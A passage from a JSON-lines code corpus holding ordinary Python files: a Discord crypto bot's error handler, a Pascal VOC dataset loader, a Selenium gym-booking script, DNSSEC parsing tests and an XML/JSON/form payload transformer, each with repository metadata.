f'__Bad Argument Provided __'\n message = f'You have provided wrong argument either for amount or than for the recipient'\n await custom_messages.system_message(ctx=ctx, color_code=1, message=message, destination=1,\n sys_msg_title=title)\n elif isinstance(error, AssertionError):\n title = f'__Amount Check failed __'\n message = f'You have provided wrong amount for tx value.'\n await 
custom_messages.system_message(ctx=ctx, color_code=1, message=message, destination=1,\n sys_msg_title=title)\n elif isinstance(error, commands.CommandOnCooldown):\n title = f'__Command on cool-down__!'\n message = f'{error}. Please try again after {error.retry_after}s'\n await custom_messages.system_message(ctx=ctx, color_code=1, message=message, destination=1,\n sys_msg_title=title)\n\n elif isinstance(error, commands.MissingRequiredArgument):\n title = f'__Missing Required Argument Error __'\n message = f'{str(error)}'\n await custom_messages.system_message(ctx=ctx, color_code=1, message=message, destination=1,\n sys_msg_title=title)\n\n\ndef setup(bot):\n bot.add_cog(TransactionCommands(bot))\n", "repo_name": "Crypto-Link-Payments/crypto-link", "sub_path": "cogs/transactions.py", "file_name": "transactions.py", "file_ext": "py", "file_size_in_byte": 19256, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "31", "api": [{"api_name": "cogs.utils.systemMessaages.CustomMessages", "line_number": 8, "usage_type": "call"}, {"api_name": "nextcord.ext.commands.Cog", "line_number": 26, "usage_type": "attribute"}, {"api_name": "nextcord.ext.commands", "line_number": 26, "usage_type": "name"}, {"api_name": "cogs.utils.monetaryConversions.convert_to_usd", "line_number": 110, "usage_type": "call"}, {"api_name": "cogs.utils.monetaryConversions", "line_number": 110, "usage_type": "name"}, {"api_name": "nextcord.User", "line_number": 153, "usage_type": "name"}, {"api_name": "nextcord.User", "line_number": 265, "usage_type": "name"}, {"api_name": "re.search", "line_number": 266, "usage_type": "call"}, {"api_name": "nextcord.ext.commands.group", "line_number": 260, "usage_type": "call"}, {"api_name": "nextcord.ext.commands", "line_number": 260, "usage_type": "name"}, {"api_name": "nextcord.ext.commands.check", "line_number": 261, "usage_type": "call"}, {"api_name": "utils.customCogChecks.is_public", "line_number": 261, "usage_type": "argument"}, {"api_name": "nextcord.ext.commands", "line_number": 261, "usage_type": "name"}, {"api_name": "nextcord.ext.commands.check", "line_number": 262, "usage_type": "call"}, {"api_name": "utils.customCogChecks.has_wallet", "line_number": 262, "usage_type": "argument"}, {"api_name": "nextcord.ext.commands", "line_number": 262, "usage_type": "name"}, {"api_name": "nextcord.ext.commands.guild_only", "line_number": 263, "usage_type": "call"}, {"api_name": "nextcord.ext.commands", "line_number": 263, "usage_type": "name"}, {"api_name": "nextcord.ext.commands.cooldown", "line_number": 264, "usage_type": "call"}, {"api_name": "nextcord.ext.commands", "line_number": 264, "usage_type": "name"}, {"api_name": "nextcord.ext.commands.BucketType", "line_number": 264, "usage_type": "attribute"}, {"api_name": "nextcord.User", "line_number": 283, "usage_type": "name"}, {"api_name": "re.search", "line_number": 284, "usage_type": "call"}, {"api_name": "nextcord.ext.commands.group", "line_number": 278, "usage_type": "call"}, {"api_name": "nextcord.ext.commands", "line_number": 278, "usage_type": "name"}, {"api_name": "nextcord.ext.commands.check", "line_number": 279, "usage_type": "call"}, {"api_name": "utils.customCogChecks.is_public", "line_number": 279, "usage_type": "argument"}, {"api_name": "nextcord.ext.commands", "line_number": 279, "usage_type": "name"}, {"api_name": "nextcord.ext.commands.check", "line_number": 280, "usage_type": "call"}, {"api_name": "utils.customCogChecks.has_wallet", "line_number": 280, "usage_type": 
"argument"}, {"api_name": "nextcord.ext.commands", "line_number": 280, "usage_type": "name"}, {"api_name": "nextcord.ext.commands.guild_only", "line_number": 281, "usage_type": "call"}, {"api_name": "nextcord.ext.commands", "line_number": 281, "usage_type": "name"}, {"api_name": "nextcord.ext.commands.cooldown", "line_number": 282, "usage_type": "call"}, {"api_name": "nextcord.ext.commands", "line_number": 282, "usage_type": "name"}, {"api_name": "nextcord.ext.commands.BucketType", "line_number": 282, "usage_type": "attribute"}, {"api_name": "nextcord.ext.commands.CheckFailure", "line_number": 298, "usage_type": "attribute"}, {"api_name": "nextcord.ext.commands", "line_number": 298, "usage_type": "name"}, {"api_name": "nextcord.ext.commands.BadArgument", "line_number": 305, "usage_type": "attribute"}, {"api_name": "nextcord.ext.commands", "line_number": 305, "usage_type": "name"}, {"api_name": "nextcord.ext.commands.CommandOnCooldown", "line_number": 315, "usage_type": "attribute"}, {"api_name": "nextcord.ext.commands", "line_number": 315, "usage_type": "name"}, {"api_name": "nextcord.ext.commands.MissingRequiredArgument", "line_number": 321, "usage_type": "attribute"}, {"api_name": "nextcord.ext.commands", "line_number": 321, "usage_type": "name"}]}
+{"seq_id": "705030755", "text": "import os\nimport math\nimport torch\nimport collections\nimport numpy as np\nfrom PIL import Image\nfrom bs4 import BeautifulSoup\n\nfrom torch.utils.data import Dataset, DataLoader\n\n\nclass VOCDataset(Dataset):\n def __init__(self, VOC2012_dir):\n\n self.idx2class = [\n \"background\", \"aeroplane\", \"bicycle\", \"bird\", \"boat\", \"bottle\", \"bus\",\n \"car\", \"cat\", \"chair\", \"cow\", \"diningtable\", \"dog\", \"horse\", \"motorbike\",\n \"person\", \"pottedplant\", \"sheep\", \"sofa\", \"train\", \"tvmonitor\"]\n\n self.class2idx = {\n \"background\": 0, \"aeroplane\": 1, \"bicycle\": 2, \"bird\": 3, \"boat\": 4, \"bottle\": 5,\n \"bus\": 6, \"car\": 7, \"cat\": 8, \"chair\": 9, \"cow\": 10, \"diningtable\": 11, \"dog\": 12,\n \"horse\": 13, \"motorbike\": 14, \"person\": 15, \"pottedplant\": 16, \"sheep\": 17,\n \"sofa\": 18, \"train\": 19, \"tvmonitor\": 20}\n\n image_dir = os.path.join(VOC2012_dir, \"JPEGImages\")\n file_names = os.listdir(image_dir)\n self.images = [os.path.join(image_dir, x) for x in file_names]\n\n target_dir = os.path.join(VOC2012_dir, \"Annotations\")\n file_names = os.listdir(target_dir)\n self.annotations = [os.path.join(target_dir, x) for x in file_names]\n\n assert len(self.images) == len(self.annotations)\n\n def __getitem__(self, index):\n assert index < self.__len__()\n\n image = Image.open(self.images[index]).convert(\"RGB\")\n # Image shape: H W C\n image = np.asarray(image)\n # to [0,1]\n image = image / 255.0\n # permute axes: C H W\n image = np.transpose(image, (2, 0, 1))\n # To tensor\n image = torch.from_numpy(image)\n image = image.type(torch.FloatTensor)\n \n target = self.parse_voc_xml(self.annotations[index])\n\n return image, target\n\n def __len__(self):\n return len(self.images)\n\n def parse_voc_xml(self, xml_path):\n soup = BeautifulSoup(open(xml_path), features=\"html.parser\").annotation\n o = soup.find_all(\"object\")\n labels = []\n bboxes = []\n for obj in o:\n obj_class = obj.find(\"name\").string\n obj_class_idx = self.class2idx[obj_class]\n xmin = int(float(obj.find(\"xmin\").string))\n xmax = int(float(obj.find(\"xmax\").string))\n ymin = int(float(obj.find(\"ymin\").string))\n ymax = int(float(obj.find(\"ymax\").string))\n labels.append(obj_class_idx)\n bboxes.append([xmin, ymin, xmax, ymax])\n targets = {\n \"boxes\": torch.tensor(bboxes),\n \"labels\": torch.tensor(labels),\n }\n return targets\n\n\nclass VOCLoader:\n def __init__(self, dataset, batch_size, shuffle, val_proportion=None):\n self.dataset = dataset\n self.batch_size = batch_size\n self.shuffle = shuffle\n self.dataset_len = len(dataset)\n self.train_total_iters = math.ceil(self.dataset_len / batch_size)\n self.train_current = 0\n self.val_current = 0\n self.training = True\n self.val_proportion = val_proportion\n self.set_index()\n print(\"train total iters:\" + str(self.train_total_iters))\n print(\"train total iters:\" + str(self.val_total_iters))\n\n def set_index(self):\n self.train_current = 0\n self.val_current = 0\n idx_pool = np.arange(self.dataset_len)\n if self.shuffle:\n np.random.shuffle(idx_pool)\n self.train_idx = idx_pool\n self.val_idx = None\n self.num_train = num_train = self.dataset_len\n self.num_val = 0\n if self.val_proportion is not None:\n num_val = int(self.val_proportion * self.dataset_len)\n num_train = self.dataset_len - num_val\n self.num_train = num_train\n self.num_val = num_val\n self.train_idx = idx_pool[:num_train]\n self.val_idx = idx_pool[num_train:]\n self.train_total_iters = 
math.ceil(num_train / self.batch_size)\n self.val_total_iters = math.ceil(num_val / self.batch_size)\n \n def __iter__(self):\n return self\n\n def __next__(self):\n if self.training:\n if self.train_current < self.train_total_iters:\n sidx = self.train_current * self.batch_size\n self.train_current += 1\n if self.train_current == self.train_total_iters:\n sampled_idx = self.train_idx[sidx:]\n else:\n sampled_idx = self.train_idx[sidx: sidx + self.batch_size]\n images = []\n targets = []\n for idx in sampled_idx:\n image, target = self.dataset[idx]\n images.append(image)\n targets.append(target)\n return images, targets\n else:\n raise StopIteration\n else:\n if self.val_current < self.val_total_iters:\n sidx = self.val_current * self.batch_size\n self.val_current += 1\n if self.val_current == self.val_total_iters:\n sampled_idx = self.val_idx[sidx:]\n else:\n sampled_idx = self.val_idx[sidx: sidx + self.batch_size]\n images = []\n targets = []\n for idx in sampled_idx:\n image, target = self.dataset[idx]\n images.append(image)\n targets.append(target)\n return images, targets\n else:\n raise StopIteration\n\n def train(self):\n self.set_index()\n self.training = True\n\n def val(self):\n self.set_index()\n self.training = False\n\n\nif __name__ == \"__main__\":\n pass", "repo_name": "vlgdglv/faster-rcnn-simple", "sub_path": "VOCDataset.py", "file_name": "VOCDataset.py", "file_ext": "py", "file_size_in_byte": 5773, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "torch.utils.data.Dataset", "line_number": 12, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 39, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 39, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 48, "usage_type": "attribute"}, {"api_name": "bs4.BeautifulSoup", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 73, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.random.shuffle", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 98, "usage_type": "attribute"}, {"api_name": "math.ceil", "line_number": 110, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 111, "usage_type": "call"}]}
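A minimal usage sketch for the dataset and loader above (the VOC path is an assumption). Note that set_index() reshuffles on every train()/val() call, so with shuffle=True the train/validation partition is re-drawn each time the mode switches:

# Hypothetical local path to an extracted Pascal VOC 2012 tree
dataset = VOCDataset('/data/VOCdevkit/VOC2012')
loader = VOCLoader(dataset, batch_size=4, shuffle=True, val_proportion=0.1)

loader.train()
for images, targets in loader:
    pass  # images: list of CxHxW float tensors; targets: dicts with boxes/labels

loader.val()
for images, targets in loader:
    pass  # validation step would go here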
+{"seq_id": "24723755705", "text": "from datetime import date\nimport datetime\nimport time\nimport calendar\nimport os\nfrom selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.common.exceptions import NoSuchElementException\n\nurl = \"https://campusrecshop.usf.edu/booking\"\n\nusername = '#your net Id'\nemail = '#your email'\npassword = '#your password'\n\n\n#Troubleshooter\ndef highlight(element, effect_time, color, border):\n #Highlights (blinks) a Selenium Webdriver element\n driver = element._parent\n def apply_style(s):\n driver.execute_script(\"arguments[0].setAttribute('style', arguments[1]);\",\n element, s)\n original_style = element.get_attribute('style')\n apply_style(\"border: {0}px solid {1};\".format(border, color))\n time.sleep(effect_time)\n apply_style(original_style)\n\ndef dateTester():\n #See what day output word\n dateAll = date.today()\n dayPLZ = calendar.day_name[dateAll.weekday()]\n\n '''\n #See what day of week output number 0-6 0 = Moday \n dayPLZ = datetime.datetime.today().weekday()\n '''\n\n #print(dateAll)\n print(dayPLZ)\n\n if dayPLZ == 'Saturday' or dayPLZ == 'Wednesday':\n gDay = True\n else: \n gDay = False\n\n print(gDay)\n return gDay\n\ndef check_exists_by_id(id):\n try:\n browser.find_element_by_id(id)\n except NoSuchElementException:\n return False\n return True\n\n\n'''\ndef reservationBtns():\n browser = webdriver.Chrome(ChromeDriverManager().install())\n\n allBtns = browser.find_elements_by_xpath(\"//div[@class='btn btn-primary']\")\n\n for btn in allBtns:\n print(btn)\n\n return allBtns\n'''\n\nif __name__ == \"__main__\":\n\n gDay = dateTester()\n\n if gDay == True:\n browser = webdriver.Chrome(ChromeDriverManager().install())\n btnDiv = 'flex-center margin-top-24'\n\n browser.get(url)\n browser.maximize_window()\n\n browser.find_element_by_id('loginLink').click()\n\n time.sleep(1)\n \n browser.find_element_by_class_name(\"loginOption\").click()\n \n time.sleep(5)\n \n if browser.find_element_by_id(\"i0116\"):\n \n browser.find_element_by_id(\"i0116\").send_keys(email)\n browser.find_element_by_id(\"idSIButton9\").click()\n\n time.sleep(5)\n browser.find_element_by_id(\"i0118\").send_keys(password)\n browser.find_element_by_id(\"idSIButton9\").click()\n\n time.sleep(5)\n browser.find_element_by_id(\"idSIButton9\").click()\n\n elif browser.find_element_by_id(\"username\"):\n #Log in sequence\n browser.find_element_by_id(\"username\").send_keys(username)\n browser.find_element_by_id(\"password\").send_keys(password)\n browser.find_element_by_id(\"btn-submit\").click()\n \n\n #Click Rec link\n browser.find_element_by_class_name(\"container-image-link-item\").click()\n\n time.sleep(1)\n \n browser.find_element_by_css_selector(\".btn.btn-default.single-date-select-button.single-date-select-one-click\").click()\n\n time.sleep(1)\n\n tester = browser.find_element_by_css_selector(\".booking-slot-item-right.booking-slot-action-item\")\n\n #highlight(tester, 5, \"yellow\", 15)\n\n #tester.click()\n '''\n #Highlights the Div containing the button\n btnDiv = browser.find_element_by_xpath(\"//div[@class='booking-slot-item'][@data-slot-number='2']\")\n highlight(btnDiv, 2, \"blue\", 15)\n '''\n\n '''\n #Finds all Book Now buttons on the page\n btn = browser.find_elements_by_xpath(\"//button[@class='btn btn-primary']\")\n for btns in btn:\n print(btns)\n highlight(btns, 5, \"yellow\", 15)\n '''\n \n browser.find_elements_by_xpath(\"//button[@class='btn btn-primary']\")[1].click()\n\n #browser.close()\n\n else:\n 
print(\"No Gym Class tommorrow\")\n", "repo_name": "XzavierMcK/Python", "sub_path": "Auto Reserve Gym/GymReservation.py", "file_name": "GymReservation.py", "file_ext": "py", "file_size_in_byte": 3936, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "time.sleep", "line_number": 26, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 31, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 31, "usage_type": "name"}, {"api_name": "calendar.day_name", "line_number": 32, "usage_type": "attribute"}, {"api_name": "selenium.common.exceptions.NoSuchElementException", "line_number": 53, "usage_type": "name"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 75, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 75, "usage_type": "name"}, {"api_name": "webdriver_manager.chrome.ChromeDriverManager", "line_number": 75, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 83, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 87, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 94, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 98, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 111, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 115, "usage_type": "call"}]}
+{"seq_id": "30635746244", "text": "import datetime\nfrom unittest import TestCase\n\nfrom kskm.common.data import AlgorithmDNSSEC, Key, Signature, Signer, TypeDNSSEC\nfrom kskm.common.parse_utils import (\n duration_to_timedelta,\n keys_from_dict,\n signature_from_dict,\n)\nfrom kskm.ksr.parse_utils import signers_from_list\n\n\nclass Test_duration_to_timedelta(TestCase):\n def test_duration_to_timedelta_empty(self):\n \"\"\" Test empty input \"\"\"\n td = duration_to_timedelta(\"\")\n self.assertEqual(td.total_seconds(), 0)\n\n def test_duration_to_timedelta_basic(self):\n \"\"\" Test the most basic case \"\"\"\n td = duration_to_timedelta(\"P1D\")\n self.assertEqual(td.total_seconds(), 86400)\n\n def test_duration_to_timedelta_day_hour(self):\n \"\"\" Test hour \"\"\"\n td = duration_to_timedelta(\"P1H\")\n self.assertEqual(td.total_seconds(), 3600)\n\n def test_duration_to_timedelta_day_minute(self):\n \"\"\" Test both day and minute \"\"\"\n td = duration_to_timedelta(\"P1DT1M\")\n self.assertEqual(td.total_seconds(), 86460)\n\n def test_duration_to_timedelta_day_second(self):\n \"\"\" Test day and second \"\"\"\n td = duration_to_timedelta(\"P1D1\")\n self.assertEqual(td.total_seconds(), 86401)\n\n def test_duration_to_timedelta_second(self):\n \"\"\" Test second \"\"\"\n td = duration_to_timedelta(\"P11S\")\n self.assertEqual(td.total_seconds(), 11)\n\n def test_duration_to_timedelta_week(self):\n \"\"\" Test second \"\"\"\n td = duration_to_timedelta(\"P1W\")\n self.assertEqual(td.total_seconds(), 86400 * 7)\n\n def test_bogus(self):\n \"\"\" Test totally bogus duration \"\"\"\n with self.assertRaises(ValueError):\n duration_to_timedelta(\"foo\")\n\n def test_invalid(self):\n \"\"\" Test invalid duration \"\"\"\n with self.assertRaises(ValueError):\n duration_to_timedelta(\"Pfoo\")\n\n\nclass Test_signers_from_list(TestCase):\n def test_basic(self):\n \"\"\" Test basic KSR Signer parsing \"\"\"\n data = [\n {\"attrs\": {\"keyIdentifier\": \"KC00020\"}, \"value\": \"\"},\n {\"attrs\": {\"keyIdentifier\": \"KC00094\"}, \"value\": \"\"},\n ]\n out = signers_from_list(data)\n self.assertEqual(\n out, {Signer(key_identifier=\"KC00020\"), Signer(key_identifier=\"KC00094\")}\n )\n\n def test_no_signer(self):\n \"\"\" Test that KSR Signer is optional \"\"\"\n self.assertIsNone(signers_from_list([]))\n\n\nclass Test_keys_from_list(TestCase):\n def test_basic(self):\n \"\"\" Test basic KSR Key parsing \"\"\"\n data = [\n {\n \"attrs\": {\"keyIdentifier\": \"ZSK-24315\", \"keyTag\": \"24315\"},\n \"value\": {\n \"Algorithm\": \"5\",\n \"Flags\": \"256\",\n \"Protocol\": \"3\",\n \"PublicKey\": \"A...\",\n \"TTL\": 1978,\n },\n }\n ]\n out = keys_from_dict(data)\n expected = {\n Key(\n key_identifier=\"ZSK-24315\",\n key_tag=24315,\n ttl=1978,\n flags=256,\n protocol=3,\n algorithm=AlgorithmDNSSEC.RSASHA1,\n public_key=b\"A...\",\n )\n }\n self.assertEqual(out, expected)\n\n def test_with_ttl(self):\n \"\"\" Test Key with TTL \"\"\"\n data = [\n {\n \"attrs\": {\"keyIdentifier\": \"ZSK-24315\", \"keyTag\": \"24315\"},\n \"value\": {\n \"Algorithm\": \"5\",\n \"Flags\": \"256\",\n \"Protocol\": \"3\",\n \"PublicKey\": \"A...\",\n \"TTL\": \"1978\",\n },\n }\n ]\n out = keys_from_dict(data)\n expected = {\n Key(\n key_identifier=\"ZSK-24315\",\n key_tag=24315,\n ttl=1978,\n flags=256,\n protocol=3,\n algorithm=AlgorithmDNSSEC.RSASHA1,\n public_key=b\"A...\",\n )\n }\n self.assertEqual(out, expected)\n\n def test_ecdsa_key(self):\n \"\"\" Test loading an ECDSA key \"\"\"\n public_key = 
r\"BGuqYyOGr0p/uKXm0MmP4Cuiml/a8FCPRDLerVyBS4jHmJlKTJmYk/nCbOp936DSh5SMu6+2WYJUI6K5AYfXbTE=\"\n data = [\n {\n \"attrs\": {\"keyIdentifier\": \"EC1\", \"keyTag\": \"0\"},\n \"value\": {\n \"Algorithm\": AlgorithmDNSSEC.ECDSAP256SHA256.value,\n \"Flags\": \"256\",\n \"Protocol\": \"3\",\n \"PublicKey\": public_key,\n \"TTL\": \"1978\",\n },\n }\n ]\n out = keys_from_dict(data)\n expected = {\n Key(\n key_identifier=\"EC1\",\n key_tag=0,\n ttl=1978,\n flags=256,\n protocol=3,\n algorithm=AlgorithmDNSSEC.ECDSAP256SHA256,\n public_key=public_key.encode(),\n )\n }\n self.assertEqual(out, expected)\n\n # now change the algorithm and verify that the discrepancy between curve point size and algorithm is detected\n data[0][\"value\"][\"Algorithm\"] = AlgorithmDNSSEC.ECDSAP384SHA384.value\n with self.assertRaises(ValueError) as exc:\n keys_from_dict(data)\n self.assertEqual(\n \"Unexpected ECDSA key length 256 for algorithm AlgorithmDNSSEC.ECDSAP384SHA384\",\n str(exc.exception),\n )\n\n\nclass Test_signature_from_dict(TestCase):\n def test_basic(self):\n \"\"\" Test basic KSR Signature parsing \"\"\"\n sig = {\n \"attrs\": {\"keyIdentifier\": \"ZSK-24315\"},\n \"value\": {\n \"Algorithm\": \"5\",\n \"KeyTag\": \"24315\",\n \"Labels\": \"0\",\n \"OriginalTTL\": \"3600\",\n \"SignatureData\": \"SIG...\",\n \"SignatureExpiration\": \"2009-09-24T18:22:41Z\",\n \"SignatureInception\": \"2009-08-25T18:22:41Z\",\n \"SignersName\": \".\",\n \"TypeCovered\": \"DNSKEY\",\n \"TTL\": 1234,\n },\n }\n out = signature_from_dict(sig)\n utc = datetime.timezone.utc\n expected = {\n Signature(\n key_identifier=\"ZSK-24315\",\n ttl=1234,\n type_covered=TypeDNSSEC.DNSKEY,\n algorithm=AlgorithmDNSSEC.RSASHA1,\n labels=0,\n original_ttl=3600,\n signature_expiration=datetime.datetime(\n 2009, 9, 24, 18, 22, 41, tzinfo=utc\n ),\n signature_inception=datetime.datetime(\n 2009, 8, 25, 18, 22, 41, tzinfo=utc\n ),\n key_tag=24315,\n signers_name=\".\",\n signature_data=b\"SIG...\",\n )\n }\n self.assertEqual(out, expected)\n", "repo_name": "iana-org/dnssec-keytools", "sub_path": "src/kskm/ksr/tests/test_parse_utils.py", "file_name": "test_parse_utils.py", "file_ext": "py", "file_size_in_byte": 6950, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "unittest.TestCase", "line_number": 13, "usage_type": "name"}, {"api_name": "kskm.common.parse_utils.duration_to_timedelta", "line_number": 16, "usage_type": "call"}, {"api_name": "kskm.common.parse_utils.duration_to_timedelta", "line_number": 21, "usage_type": "call"}, {"api_name": "kskm.common.parse_utils.duration_to_timedelta", "line_number": 26, "usage_type": "call"}, {"api_name": "kskm.common.parse_utils.duration_to_timedelta", "line_number": 31, "usage_type": "call"}, {"api_name": "kskm.common.parse_utils.duration_to_timedelta", "line_number": 36, "usage_type": "call"}, {"api_name": "kskm.common.parse_utils.duration_to_timedelta", "line_number": 41, "usage_type": "call"}, {"api_name": "kskm.common.parse_utils.duration_to_timedelta", "line_number": 46, "usage_type": "call"}, {"api_name": "kskm.common.parse_utils.duration_to_timedelta", "line_number": 52, "usage_type": "call"}, {"api_name": "kskm.common.parse_utils.duration_to_timedelta", "line_number": 57, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 60, "usage_type": "name"}, {"api_name": "kskm.ksr.parse_utils.signers_from_list", "line_number": 67, "usage_type": "call"}, {"api_name": "kskm.common.data.Signer", 
"line_number": 69, "usage_type": "call"}, {"api_name": "kskm.ksr.parse_utils.signers_from_list", "line_number": 74, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 77, "usage_type": "name"}, {"api_name": "kskm.common.parse_utils.keys_from_dict", "line_number": 92, "usage_type": "call"}, {"api_name": "kskm.common.data.Key", "line_number": 94, "usage_type": "call"}, {"api_name": "kskm.common.data.AlgorithmDNSSEC.RSASHA1", "line_number": 100, "usage_type": "attribute"}, {"api_name": "kskm.common.data.AlgorithmDNSSEC", "line_number": 100, "usage_type": "name"}, {"api_name": "kskm.common.parse_utils.keys_from_dict", "line_number": 120, "usage_type": "call"}, {"api_name": "kskm.common.data.Key", "line_number": 122, "usage_type": "call"}, {"api_name": "kskm.common.data.AlgorithmDNSSEC.RSASHA1", "line_number": 128, "usage_type": "attribute"}, {"api_name": "kskm.common.data.AlgorithmDNSSEC", "line_number": 128, "usage_type": "name"}, {"api_name": "kskm.common.data.AlgorithmDNSSEC.ECDSAP256SHA256", "line_number": 141, "usage_type": "attribute"}, {"api_name": "kskm.common.data.AlgorithmDNSSEC", "line_number": 141, "usage_type": "name"}, {"api_name": "kskm.common.parse_utils.keys_from_dict", "line_number": 149, "usage_type": "call"}, {"api_name": "kskm.common.data.Key", "line_number": 151, "usage_type": "call"}, {"api_name": "kskm.common.data.AlgorithmDNSSEC.ECDSAP256SHA256", "line_number": 157, "usage_type": "attribute"}, {"api_name": "kskm.common.data.AlgorithmDNSSEC", "line_number": 157, "usage_type": "name"}, {"api_name": "kskm.common.data.AlgorithmDNSSEC.ECDSAP384SHA384", "line_number": 164, "usage_type": "attribute"}, {"api_name": "kskm.common.data.AlgorithmDNSSEC", "line_number": 164, "usage_type": "name"}, {"api_name": "kskm.common.parse_utils.keys_from_dict", "line_number": 166, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 173, "usage_type": "name"}, {"api_name": "kskm.common.parse_utils.signature_from_dict", "line_number": 191, "usage_type": "call"}, {"api_name": "datetime.timezone", "line_number": 192, "usage_type": "attribute"}, {"api_name": "kskm.common.data.Signature", "line_number": 194, "usage_type": "call"}, {"api_name": "kskm.common.data.TypeDNSSEC.DNSKEY", "line_number": 197, "usage_type": "attribute"}, {"api_name": "kskm.common.data.TypeDNSSEC", "line_number": 197, "usage_type": "name"}, {"api_name": "kskm.common.data.AlgorithmDNSSEC.RSASHA1", "line_number": 198, "usage_type": "attribute"}, {"api_name": "kskm.common.data.AlgorithmDNSSEC", "line_number": 198, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 201, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 204, "usage_type": "call"}]}
+{"seq_id": "3916689097", "text": "import json\nfrom abc import ABCMeta, abstractmethod\nfrom typing import Callable, List, Union\nfrom urllib.parse import parse_qsl, urlencode\n\nfrom jsonpath_ng import parse\n\nfrom lxml import etree\n\n\nclass TransformerError(Exception):\n pass\n\n\nclass PayloadTransformer(metaclass=ABCMeta):\n @abstractmethod\n def transform(\n self,\n payload: Union[str, bytes],\n transformer_array: List[str],\n operation: Callable,\n ) -> Union[str, bytes]:\n pass\n\n\nclass JsonTransformer(PayloadTransformer):\n def transform(\n self,\n payload: Union[str, bytes],\n transformer_array: List[str],\n operation: Callable,\n ):\n payload_json = json.loads(payload)\n for expression in transformer_array:\n json_expr = parse(expression)\n for match in json_expr.find(payload_json):\n json_expr.update(payload_json, operation(match.value))\n return json.dumps(payload_json)\n\n\nclass FormDataTransformer(PayloadTransformer):\n def transform(\n self,\n payload: Union[str, bytes],\n transformer_array: List[str],\n operation: Callable,\n ) -> str:\n result = []\n target_fields = set(transformer_array)\n if isinstance(payload, bytes):\n payload = payload.decode()\n\n for name, value in parse_qsl(payload, keep_blank_values=True):\n if value and name in target_fields:\n value = operation(value)\n result.append((name, value))\n\n return urlencode(result)\n\n\nclass XMLTransformer(PayloadTransformer):\n def transform(\n self,\n payload: Union[str, bytes],\n transformer_array: List[str],\n operation: Callable,\n ) -> str:\n try:\n root = etree.fromstring(payload)\n except etree.XMLSyntaxError as exc:\n raise TransformerError(f'Invalid XML payload: {exc}.') from exc\n\n has_matches = False\n for expr in transformer_array:\n try:\n for element in root.xpath(expr):\n has_matches = True\n self._transform(operation, element)\n\n except etree.XPathEvalError as exc:\n raise TransformerError(\n f'Invalid XPath expression {expr}: {exc}.'\n ) from exc\n\n if has_matches:\n return etree.tostring(root, encoding='utf-8').decode('utf-8')\n\n return payload\n\n def _transform(self, operation: Callable, element: etree.ElementBase):\n value = ''.join(element.itertext())\n if not value:\n return\n element.clear()\n element.text = operation(value)\n\n\ntransformer_map = {\n 'FORM_FIELD': FormDataTransformer(),\n 'JSON_PATH': JsonTransformer(),\n 'XPATH': XMLTransformer(),\n}\n", "repo_name": "mnimmny/vgs-satellite", "sub_path": "satellite/vault/transformer.py", "file_name": "transformer.py", "file_ext": "py", "file_size_in_byte": 2808, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "31", "api": [{"api_name": "abc.ABCMeta", "line_number": 15, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 19, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 20, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 21, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 16, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 22, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 29, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 30, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 31, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 33, "usage_type": "call"}, {"api_name": "jsonpath_ng.parse", "line_number": 35, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 38, "usage_type": "call"}, {"api_name": 
